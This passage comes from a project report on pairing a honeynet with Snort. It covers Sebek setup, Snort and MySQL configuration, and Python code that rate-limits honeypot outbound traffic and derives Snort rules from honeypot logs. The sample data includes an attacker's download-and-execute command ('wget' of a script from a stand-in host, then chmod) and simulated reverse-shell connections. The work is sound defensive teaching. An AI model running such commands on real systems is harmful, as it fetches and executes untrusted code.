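        self._buckets[(src, proto)] = (start, count + 1)
        return Decision("allow", f"{proto} connection {count + 1}/{self.limits[proto]} this hour")


def replay(control, attempts):
    """attempts: iterable of (ts, src, dst, proto, dport); returns the list of verdicts."""
    return [control.outbound(*a).verdict for a in attempts]


def demo():
    hw = HoneywallControl(honeypots={"10.0.0.20"},
                          blacklist=["203.0.113.0/24"],     # constructed blacklist.txt content
                          whitelist=["192.0.2.10/32"],      # constructed whitelist.txt content
                          dns_servers={"10.0.0.1"})
    # constructed: an attacker on the honeypot opens 25 reverse connections in 25 seconds
    burst = [(t, "10.0.0.20", "198.51.100.5", "tcp", 4444) for t in range(25)]
    return hw, replay(hw, burst)


if __name__ == "__main__":
    hw, verdicts = demo()
    print(f"{verdicts.count('allow')} allowed, {verdicts.count('limit')} limited")
    print(hw.outbound(3600, "10.0.0.20", "198.51.100.5", "tcp", 4444))
```

Inbound traffic towards the honeypots is deliberately not budgeted, matching the honeynet's purpose of letting attackers in; only what a compromised honeypot can send out is limited, which is what keeps the honeynet from becoming a launch point against third parties.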

b. Installing the Sebek client:
In the honeynet, each honeypot must have the Sebek client installed so that the attacker's actions are logged and the logs are sent to the Sebek server on the honeywall. From these captured logs, Snort rules are derived so that the same kind of attack can be blocked the next time.
The group used an Ubuntu Server 7.10 honeypot for the Sebek client, with the package sebek-lin26-3.2.0b-bin.tar.gz.
After installing Ubuntu Server and logging in, extract the Sebek package with:
tar zxf sebek-lin26-3.2.0b-bin.tar.gz
Change into the sebek-lin26-3.2.0b-bin directory:
cd sebek-lin26-3.2.0b-bin
In that directory, open the file sbk_install.sh:
nano sbk_install.sh
The configuration section of sbk_install.sh appears as in the figure below.
Continue by editing the file: set Destination Port to 1101 (Sebek sends its records over UDP, so this must match the destination UDP port configured on the honeywall) and Destination MAC to the MAC address of the honeywall. Here the honeywall's MAC address used by the group is 00:0C:29:25:5E:E7.
To start the Sebek client installation, run:
sudo ./sbk_install.sh
The Sebek client is now installed on the honeypot.
2. The NIDS system
A NIDS is a category of IDS that monitors activity across the whole network, covering many different hosts.
Snort is a NIDS developed by Martin Roesch. It is free, open-source, easy to use and feature-rich. Snort runs on many operating systems (Windows, Linux, macOS), is small and highly customisable, and can continuously detect unauthorised intrusions into a system.
Snort is placed on the network to monitor the packets entering and leaving the system. When it detects an attack it alerts the administrator or, depending on how it is configured, blocks or drops the packet. Snort uses rules to detect intrusive activity: when a packet matches one of the rules, Snort treats it as an attack and reacts to that packet. Each rule corresponds to one attack method. Snort's main configuration file is snort.conf.
Snort can be configured to run in the following modes:
- Sniffer (snort -v): listens to packets on the network, decodes them and displays them on the console.
- Packet Logger (snort -l /var/log/snort): decoded packets are logged to files in binary (pcap) or ASCII form.
- NIDS (snort -c /etc/snort/snort.conf -i eth0): Snort applies its rules to every captured packet, compares them and takes the corresponding action.
- Inline: Snort receives packets from iptables, compares them against the rules and tells iptables how to handle each packet (pass or drop).
1.1 Study of the Snort application
1.1.1 Snort architecture
Snort consists of several components that work together to detect a specific attack; each logical component has a different task.

Figure: Snort architecture model
- Packet decoder: when Snort runs it captures every packet travelling through the system. The decoder identifies the protocols in use, starting from the data-link type of the capture interface, and a decoded packet is passed on to the pre-processing stage. Snort raises an alert when it detects malformed or abnormal headers.
- Pre-processors: at this stage the pre-processors have three main tasks:
  - Reassembly: a large packet is fragmented into several smaller packets when it is sent; this stage reassembles the fragments into the original packet.
  - Protocol decoding and normalisation:
  -

- Detection engine: packets processed by the pre-processors are passed on to the detection stage, the most important part of Snort. Here each packet is compared with the rules to decide whether it is legitimate or whether it carries content with the attack intent defined in a rule.
The detection engine can also split a packet into its parts and apply rules to each part separately.
An IDS may have many rules and usually receives a very large volume of traffic; when the network throughput is too high, packets may be missed or responses delayed, which is one of the weaknesses of packet-based detection.
- Logging and alerting system: after detection, if an intrusion is found the packet is passed to logging/alerting; the result is written to a log and a notification is sent to the system or the administrator. The log files are text data files.
- Output module: performs the different ways of storing the output, depending on the system configuration: writing log files, writing alerts to a database, or producing XML logs.
1.1.2 Snort rules:
Snort rules are created from the information and indicators left by intrusive activity.
Rules can be updated from the Snort home page, www.snort.org, or users can define and develop their own rules according to their needs.
Rules are the core of the IDS; they are what lets it recognise attacks against the system.

1.1.3 Snort's blocking mode (Snort-Inline)
Snort Inline is a development branch of Snort by William Metcalf
1.2 Detailed network model for the system
Figure: Snort deployment model (Single Snort Sensor)
1.3 Deploying, installing and operating Snort (configuring rules, creating the Snort database, ...)
a. System deployment:
The system is deployed according to the model above (Figure: ).
- The attacker's machine has IP address 10.0.0.50 and comes with attack tools such as nmap and hping3 pre-installed.
- The web server has IP address 10.0.0.10.
- The Snort server has no IP address and is therefore transparent (invisible) to the attacker.
b. Installing Snort
Install the packages snort, mysql-server and snort-mysql in turn (using apt-get).
Creating the Snort database in MySQL
Step 1: Log in to MySQL
# mysql -u root -p
Step 2: Create a user for Snort
mysql> use mysql;
mysql> CREATE USER 'snort'@'localhost' IDENTIFIED BY '123456';
(123456 is the password used in this lab; on any sensor that is not an isolated test system use a strong password, since it also ends up in plain text in snort.conf below.)
Step 3: Create the database for Snort
mysql> CREATE DATABASE snort;
mysql> GRANT ALL ON snort.* TO 'snort'@'localhost';
mysql> FLUSH PRIVILEGES;
mysql> exit;
Step 4: Create the tables in the Snort database
(Change to the directory containing the schema, for example: cd /usr/share/doc/snort-mysql)
# zcat create_mysql.gz | mysql -u snort -p snort
Step 5: Check the result
# mysql -u root -p
mysql> show databases;
+------------+
| Database   |
+------------+
| mysql      |
| snort      |
| test       |
+------------+
mysql> use snort;
mysql> show tables;
+------------------+
| Tables_in_snort  |
+------------------+
| data             |
| detail           |
| encoding         |
| event            |
| flags            |
| icmphdr          |
| iphdr            |
| opt              |
| protocols        |
| reference        |
| reference_system |
| schema           |
| sensor           |
| services         |
| sig_class        |
| sig_reference    |
| signature        |
| tcphdr           |
| udphdr           |
+------------------+
Configuring Snort
Configuration file: /etc/snort/snort.conf
- Change the HOME_NET and EXTERNAL_NET addresses:
var HOME_NET 10.0.0.0/24
var EXTERNAL_NET !$HOME_NET
- Change the path to the rules directory:
var RULE_PATH /etc/snort/rules
- Set the database output to the database, user and password created above:
output database: alert, mysql, user=snort password=123456 dbname=snort host=localhost
Start the services
# service mysql restart
# service snort restart
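Once Snort is writing to the database, the alerts are read back with SQL. The following added example (illustration code, not part of this report) builds an in-memory SQLite copy of three tables from Snort's create_mysql schema (signature, event and iphdr, with a subset of their columns), fills them with constructed rows, and runs the query an analyst would run against the MySQL database configured above to see which signatures fired, from which source address, and when. The column names follow the Snort schema; the sample events and the second signature are made up.

```python
"""Summarise Snort alerts stored in the 'snort' database.

Added example. It mirrors three tables of Snort's create_mysql schema
(column subset) in SQLite and fills them with constructed rows so the
analyst query can be run offline; the query itself is what one would run
against the MySQL database created in the report.
"""
import sqlite3
from ipaddress import IPv4Address

SCHEMA = """
CREATE TABLE sensor   (sid INTEGER PRIMARY KEY, hostname TEXT, interface TEXT);
CREATE TABLE signature(sig_id INTEGER PRIMARY KEY, sig_name TEXT, sig_class_id INTEGER,
                       sig_priority INTEGER, sig_rev INTEGER, sig_sid INTEGER, sig_gid INTEGER);
CREATE TABLE event    (sid INTEGER, cid INTEGER, signature INTEGER, timestamp TEXT,
                       PRIMARY KEY (sid, cid));
CREATE TABLE iphdr    (sid INTEGER, cid INTEGER, ip_src INTEGER, ip_dst INTEGER,
                       ip_proto INTEGER, ip_ttl INTEGER, PRIMARY KEY (sid, cid));
"""


# Snort stores addresses as unsigned 32-bit integers (the MySQL INET_ATON form).
def ip_to_int(addr):
    return int(IPv4Address(addr))


def int_to_ip(n):
    return str(IPv4Address(n))


# Constructed events: (cid, sig_id, timestamp, src, dst, ip_proto, ttl)
SAMPLE_EVENTS = [
    (1, 1, "2013-11-20 09:00:01", "10.0.0.50", "10.0.0.10", 1, 64),
    (2, 1, "2013-11-20 09:00:02", "10.0.0.50", "10.0.0.10", 1, 64),
    (3, 2, "2013-11-20 09:01:10", "10.0.0.50", "10.0.0.10", 6, 64),
    (4, 2, "2013-11-20 09:01:11", "10.0.0.50", "10.0.0.10", 6, 64),
    (5, 2, "2013-11-20 09:01:12", "10.0.0.50", "10.0.0.20", 6, 64),
    (6, 1, "2013-11-20 09:05:00", "198.51.100.9", "10.0.0.10", 1, 52),
]


def build_sample_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.execute("INSERT INTO sensor VALUES (1, 'snort-sensor', 'eth0')")
    con.executemany("INSERT INTO signature VALUES (?,?,?,?,?,?,?)", [
        (1, "Co nguoi dang ping", 1, 3, 1, 1000, 1),                     # the report's test rule
        (2, "LOCAL nmap SYN scan on web server", 2, 2, 1, 1000001, 1),   # constructed
    ])
    for cid, sig, ts, src, dst, proto, ttl in SAMPLE_EVENTS:
        con.execute("INSERT INTO event VALUES (1,?,?,?)", (cid, sig, ts))
        con.execute("INSERT INTO iphdr VALUES (1,?,?,?,?,?)",
                    (cid, ip_to_int(src), ip_to_int(dst), proto, ttl))
    return con


# One row per (rule, attacker): how often it fired and over which period.
ALERTS_BY_SOURCE = """
SELECT s.sig_sid, s.sig_name, i.ip_src, COUNT(*) AS hits,
       MIN(e.timestamp) AS first_seen, MAX(e.timestamp) AS last_seen
FROM event e
JOIN signature s ON s.sig_id = e.signature
JOIN iphdr i     ON i.sid = e.sid AND i.cid = e.cid
GROUP BY s.sig_sid, s.sig_name, i.ip_src
ORDER BY hits DESC, s.sig_sid
"""


def alerts_by_source(con):
    """Return [(snort sid, message, source ip, hits, first_seen, last_seen), ...]."""
    rows = con.execute(ALERTS_BY_SOURCE).fetchall()
    return [(sid, name, int_to_ip(src), hits, first, last)
            for sid, name, src, hits, first, last in rows]


if __name__ == "__main__":
    for row in alerts_by_source(build_sample_db()):
        print(row)
```

Against the real MySQL database the same query runs unchanged except that the address conversion is done by MySQL's INET_NTOA(i.ip_src) instead of in Python. Joining event to iphdr on both sid and cid matters: cid is only unique per sensor, so a join on cid alone would mix up events from different sensors once a second sensor logs to the same database.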
c. Operating Snort
Create a simple rule to test Snort:
- Create the file test.rules in the rules directory:
# touch /etc/snort/rules/test.rules
- Add the following line to test.rules (the msg "Co nguoi dang ping" means "someone is pinging"):
alert icmp any any -> any any (msg:"Co nguoi dang ping"; ttl:64; sid:1000; rev:1;)
(The ttl:64 option means the rule matches only ICMP packets that arrive with a TTL of exactly 64, i.e. from a Linux host on the same segment, as the attacker's machine is here; a ping routed through one hop would not match. Note also that Snort reserves sids below 1,000,000 for the official rule sets; locally written rules should normally use 1000000 and above.)
- Add the line include $RULE_PATH/test.rules to snort.conf.
- Restart the service: # service snort restart
Start Snort in alert-to-console mode:
# snort -A console -c /etc/snort/snort.conf -l /var/log/snort
Ping the web server from the attacker's machine (see Figure: ).
Result:
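The rules section above states that signatures are derived from the indicators an intrusion leaves behind, and the test just shown is a single hand-written rule. The following added example (illustration code, neither the group's nor the Honeywall project's) carries that idea one step further along the lines of this project's title: it reads constructed honeywall observations (connection records and Sebek keystroke records in formats assumed here purely for illustration), derives a probing rule per attacker and port that fires through detection_filter only after repeated attempts, derives a content rule for the download command the attacker typed on the honeypot, assigns sids from the local range, and checks each generated rule's syntax before it would be appended to test.rules.

```python
"""Generate Snort rules from honeynet observations.

Added example for the report's goal of turning honeypot logs into IDS
signatures; it is not the group's code or part of the Honeywall tools.
The input formats (flow records and Sebek keystroke records, constructed
inline) and the rule templates are this example's own assumptions.
Generated sids start at 1000000, the range Snort leaves for local rules.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

LOCAL_SID_START = 1000000
HOME_NET = "$HOME_NET"   # the report sets var HOME_NET 10.0.0.0/24 in snort.conf

# Constructed sample of what the honeywall recorded (not real Hflow/Sebek output).
FLOWS = """\
2013-11-20T09:01:10 tcp 10.0.0.50:41022 -> 10.0.0.20:22
2013-11-20T09:01:11 tcp 10.0.0.50:41023 -> 10.0.0.20:22
2013-11-20T09:01:12 tcp 10.0.0.50:41024 -> 10.0.0.20:22
2013-11-20T09:02:01 tcp 10.0.0.50:41100 -> 10.0.0.20:80
2013-11-20T09:03:00 udp 198.51.100.9:53012 -> 10.0.0.20:161
2013-11-20T09:03:01 udp 198.51.100.9:53013 -> 10.0.0.20:161
2013-11-20T09:03:02 udp 198.51.100.9:53014 -> 10.0.0.20:161
"""
KEYSTROKES = """\
2013-11-20T09:04:30 10.0.0.20 pid=2311 uid=0 cmd=sh: wget http://198.51.100.9/x.sh
2013-11-20T09:04:41 10.0.0.20 pid=2311 uid=0 cmd=sh: chmod +x x.sh
"""

FLOW_RE = re.compile(r"^\S+ (tcp|udp) (\d+(?:\.\d+){3}):\d+ -> (\d+(?:\.\d+){3}):(\d+)$")
KEYS_RE = re.compile(r"^\S+ \S+ pid=\d+ uid=\d+ cmd=\S+: (.*)$")
URL_RE = re.compile(r"https?://\S+")


def snort_content(s):
    """Escape the characters that are special inside a Snort content:"..." string."""
    return (s.replace("\\", "\\\\").replace('"', '\\"')
             .replace(";", "\\;").replace("|", "|7C|"))


def safe_msg(s):
    """msg strings may not contain quotes, semicolons or backslashes."""
    return re.sub(r'[";\\]', "", s)


def scan_rules(flow_text, min_hits=3, window=60):
    """One rule per (proto, src, dport) probed at least min_hits times; detection_filter
    makes the alert fire only on the min_hits-th attempt within `window` seconds."""
    hits = Counter()
    for line in flow_text.splitlines():
        m = FLOW_RE.match(line)
        if m:
            proto, src, _dst, dport = m.groups()
            hits[(proto, src, int(dport))] += 1
    rules = []
    for (proto, src, dport), n in sorted(hits.items()):
        if n < min_hits:
            continue
        opts = [f'msg:"HONEYNET {proto.upper()}/{dport} probe from {src}"']
        if proto == "tcp":
            opts.append("flags:S")   # count connection attempts, not every data packet
        opts += [f"detection_filter:track by_src, count {min_hits}, seconds {window}",
                 "classtype:attempted-recon"]
        rules.append((f"alert {proto} {src} any -> {HOME_NET} {dport}", opts))
    return rules


def download_rules(keys_text):
    """Turn a download command typed on the honeypot into a content rule for the HTTP request."""
    rules = []
    for line in keys_text.splitlines():
        m = KEYS_RE.match(line)
        for url in (URL_RE.findall(m.group(1)) if m else []):
            u = urlsplit(url)
            path = u.path or "/"
            opts = [f'msg:"HONEYNET download of {safe_msg(path)} from {u.hostname}"',
                    "flow:to_server,established",
                    f'content:"GET {snort_content(path)}"', "nocase",
                    "classtype:trojan-activity"]
            rules.append((f"alert tcp {HOME_NET} any -> {u.hostname} {u.port or 80}", opts))
    return rules


def assemble(rule_parts, first_sid=LOCAL_SID_START):
    """Attach a unique local sid and a rev to each (header, options) pair and render it."""
    out = []
    for n, (header, opts) in enumerate(rule_parts):
        body = "; ".join(opts + [f"sid:{first_sid + n}", "rev:1"])
        out.append(f"{header} ({body};)")
    return out


RULE_RE = re.compile(r"^(alert|log|pass|drop|reject|sdrop) (tcp|udp|icmp|ip) "
                     r"(\S+) (\S+) (->|<>) (\S+) (\S+) \((.*)\)$")
OPT_RE = re.compile(r'^\s*(\w+)(?::((?:"(?:[^"\\]|\\.)*"|\\.|[^;"\\])*))?\s*;\s*')


def validate_rule(rule):
    """Syntax check before a rule goes into test.rules: well-formed header,
    ';'-terminated options, a msg, and a sid in the local range."""
    m = RULE_RE.match(rule)
    if not m:
        return False
    body, seen = m.group(8), {}
    while body:
        o = OPT_RE.match(body)
        if not o:
            return False
        seen[o.group(1)] = o.group(2)
        body = body[o.end():]
    sid = seen.get("sid") or ""
    return "msg" in seen and sid.isdigit() and int(sid) >= LOCAL_SID_START


def generate(flow_text=FLOWS, keys_text=KEYSTROKES):
    rules = assemble(scan_rules(flow_text) + download_rules(keys_text))
    bad = [r for r in rules if not validate_rule(r)]
    if bad:
        raise ValueError(f"malformed rule generated: {bad[0]}")
    return rules


if __name__ == "__main__":
    print("\n".join(generate()))   # append to /etc/snort/rules/test.rules and restart Snort
```

Run it and append the output to /etc/snort/rules/test.rules, then restart Snort as in step c. The msg and content strings are escaped because a stray quote or semicolon in captured attacker input would otherwise break the rule file (and a rule file that fails to parse takes down the whole sensor), and the sid check rejects rules that collide with the official rule set range, which is why the hand-written test rule above with sid:1000 fails validate_rule.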



CONCLUSION AND FUTURE WORK
An IDS is a security solution that complements a firewall. An IDS can detect malicious code acting even inside the internal network, and a honeypot is a decoy system that lures the attacker, protecting the real system from damage.
Deploying the IDS and the honeypot together creates a combined network that on one hand deceives the attacker to protect the real system while logging the attacker's information, attack type and tools, and on the other hand generates signatures for the IDS so that the same attack methods are recognised the next time. This is an effective and genuinely necessary security measure for a computer network, helping the system run stably and recover from incidents as quickly as possible.
Through the study and implementation of the project "Signature generation for an intrusion detection system", the group achieved the following objectives:
- A firm grasp of the concept, classification and functions of intrusion detection systems, and an understanding of how an IDS works.
- A clear understanding of the concept, classification, functions and operation of honeypots.
- How to install and deploy a honeynet, the high-interaction form of honeypot, and its role and significance.
- Using the logs captured by the honeypot to generate signatures for the intrusion detection system, producing alerts for the system when it is attacked.
Having a good IDS that produces accurate alerts and detects attacks in time also requires the administrator to keep the rules updated and to develop new ones, so that the system stays secure and stable. Developing rules by hand, however, is error-prone and not very efficient. Organising and designing rules that can be fed into the IDS automatically, generating signatures for the intrusion detection system without manual work, is therefore necessary and more effective for system security. This is the future direction of the project, and it requires a closer and tighter coupling between the IDS and the honeynet's honeywall to ensure that generation is automatic, accurate and safe.
